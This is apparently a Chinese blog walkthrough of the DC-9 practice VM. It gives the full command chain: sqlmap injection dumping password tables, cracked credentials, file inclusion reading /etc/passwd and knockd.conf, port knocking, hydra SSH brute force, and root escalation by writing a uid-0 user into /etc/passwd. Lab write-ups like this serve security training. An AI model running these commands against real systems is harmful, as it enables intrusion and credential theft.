• dc9靶机攻略


    dc9

    扫描

    扫描结果如图

    nmap

    image-20231024213117827

    目录扫描

    image-20231024213131949

    指纹扫描

    image-20231024213156824

    渗透

    访问首页

    image-20231024213222208

    该处发现搜索框,正常搜名字可以直接返回该用户的信息,怀疑sql注入,使用单引号注入,发现没反应,再使用一下万能注入语句1' or 1=1

    image-20231024214151575

    image-20231024214201604

    使用sqlmap

    sqlmap -u 'http://10.4.7.152/results.php' --data 'search=1' --dbs --batch
    
    • 1

    爆出数据库staff和users

    image-20231024215600177

    爆表

    sqlmap -u 'http://10.4.7.152/results.php' --data 'search=1' -D Staff --tables --batch
    
    sqlmap -u 'http://10.4.7.152/results.php' --data 'search=1' -D users --tables --batch
    
    • 1
    • 2
    • 3

    image-20231024215724573

    暴列

    sqlmap -u 'http://10.4.7.152/results.php' --data 'search=1' -D Staff -T Users --columns --batch
    
    sqlmap -u 'http://10.4.7.152/results.php' --data 'search=1' -D users -T UserDetails --columns --batch
    
    • 1
    • 2
    • 3

    image-20231024215804988

    爆数据

    sqlmap -u 'http://10.4.7.152/results.php' --data 'search=1' -D Staff -T Users -C Username,Password --dump --batch
    
    sqlmap -u 'http://10.4.7.152/results.php' --data 'search=1' -D users -T UserDetails -C username,password --dump --batch
    
    • 1
    • 2
    • 3

    得到一个admin用户信息以及user库中的用户信息

    image-20231024215949015

    image-20231024222141469

    admin:856f5de590ef37314e7c3bdf6f8a66dc
    
    • 1

    拿去hash识别器识别一下

    image-20231024220048377

    使用md5解密最终得到

    admin:transorbital1
    
    • 1

    image-20231024220307210

    登录过后发现manage页左下角显示不存在文件

    image-20231024221405809

    疑似文件包含

    反复回到根目录查看passwd文件,发现可以执行

    image-20231024221514680

    发现大部分用户都是/bin/bash的,尝试找到这些能利用的用户登录

    将刚刚爆破的users库中的用户放置在txt文件里当字典

    随后尝试爆破,发现ssh连不上

    此时即为端口敲门

    knocked配置文件在/etc/knockd.conf

    image-20231024222941648

    得到sequence=7469,8475,9842

    向靶机三次敲门

    nc 10.4.7.152 7469
    nc 10.4.7.152 8475
    nc 10.4.7.152 9842
    
    • 1
    • 2
    • 3

    image-20231024223404913

    hydra爆出登录信息

    hydra -L pojie1.txt -P pojie2.txt ssh://10.4.7.152 -t 50
    
    • 1

    image-20231024223644124

    chandlerb:UrAG0D!
    joeyt:Passw0rd
    janitor:Ilovepeepee
    
    • 1
    • 2
    • 3

    提权

    常规探查无效,经过寻找,在janitor的家目录下找到.secrets-for-putin目录

    其中有密码文件

    image-20231024225239575

    BamBam01
    Passw0rd
    smellycats
    P0Lic#10-4
    B4-Tru3-001
    4uGU5T-NiGHts
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6

    加入密码字典后重新爆破

    发现多了个用户

    fredf:B4-Tru3-001
    
    • 1

    切换该用户

    使用sudo -l发现可以免密root身份执行test

    查看test会乱码,直接执行试试

    image-20231024225850139

    提示需要找到test.py

    find名字查找一下

    find / -name test.py 2>/dev/null
    
    • 1

    image-20231024225954397

    找到位置

    /usr/lib/python3/dist-packages/setuptools/command/test.py
    
    • 1

    使用命令生成一个盐值为admin的md5密码

    openssl passwd -1 -salt admin 123456
    生成
    $1$admin$LClYcRe.ee8dQwgrFc5nz.
    
    • 1
    • 2
    • 3

    将用户信息添加到/tmp/passwd

    echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' > /tmp/passwd
    
    • 1

    image-20231024230856094

    然后sudo使用符合脚本形式的执行参数

    sudo ./test /tmp/passwd /etc/passwd
    
    • 1

    随后su 到刚刚创建的用户

    su admin
    123456
    
    • 1
    • 2

    完成提权

    image-20231024231143315

  • 相关阅读:
    YB4019是一款完整的单电池锂离子恒流/恒压线性充电器电池
    网络安全(黑客技术)—2024自学手册
    C语言:用函数实现2个字符串的交换
    细胞穿膜肽-MnO2复合物(TAT-MnO2)多肽偶联氧化锰纳米粒|MnO2包裹聚多巴胺的纳米颗粒
    中国奢侈品产业深度调研及未来发展现状趋势预测报告
    spring---第五篇
    【StreamSets 】重置管道状态——管道的数据记忆
    纯CSS制作3D动态相册【流星雨3D旋转相册】HTML+CSS+JavaScriptHTML5七夕情人节表白网页制作
    【uniapp/uview1.x】u-upload 在 v-for 中的使用时, before-upload 如何传参
    如何解决DNS解析错误
  • 原文地址:https://blog.csdn.net/qq_58683895/article/details/134024192